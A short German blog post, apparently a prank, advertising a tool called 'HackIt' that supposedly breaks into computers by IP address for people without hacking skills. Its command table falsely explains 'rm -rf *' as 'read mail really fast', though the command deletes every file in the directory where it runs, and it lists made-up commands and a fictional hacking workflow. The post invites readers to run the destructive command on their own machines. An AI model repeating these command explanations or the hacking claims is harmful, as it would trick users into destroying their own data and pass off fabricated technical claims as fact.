Hacken leicht gemacht

Flattr this!

Einen Hacker in Filmen zu beobachten ist sicherlich faszinierend und manch einer träumt bestimmt davon, eines Tages solche Fähigkeiten zu haben. Allerdings gestaltet sich das Ganze dann doch reichlich schwer, wenn man versucht, sich das nötige Wissen anzueignen.

Das Tool HackIt erlaubt es, Rechner ohne große Kenntnisse zu hacken.
Natürlich darf das Programm nur für eigene Rechner zu Testzwecken verwendet werden!!
Um das Tool zu verwenden, lädt man es sich erst einmal hier herunter. Anschließend macht man es mit dem Befehl

sudo chmod +x hackit.sh

ausführbar.Gestartet wird es einfach durch die Eingabe von

./hackit.sh Ziel IP

Als Parameter wird hier natürlich die IP Adresse des zu hackenden Computers angegeben.Nun sucht die Software mit einem speziellen Algorithmus nach Sicherheitslücken in dem Zielcomputer und verschafft uns bei einer gefundenen Sicherheitslücke Zugang.
Wärend dem Versuch, eine Sicherheitslücke zu finden, erhalten wir die Ausgabe Suche nach Sicherheitsluecken.
Sobald der Computer gehackt wurde, öffnet sich eine schwarze Konsole, die nur ein rotes hackit$ anzeigt.

Die Befehle, um auf dem gehackten Computer zu interagieren sind so einfach, wie sie nur sein könnten:

Befehl Bedeutung Funktion
rm -rf * read mail really fast Ermöglich das Lesen aller gepseicherter Mails auf dem Zielrechner
cp * ff me copy all files and folders to me Kopiert alle Dateien und Ordner des Homeverzeichnisses auf den eigenen Computer
dstr * destroy everything Zerstört alle Daten auf dem Zielrechner
exit exit Beendet das Programm

Wie man der Tabelle entnehmen kann, beendet man das Programm, nachdem man die gewünschten Befehle ausgeführt hat, einfach mit

exit

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.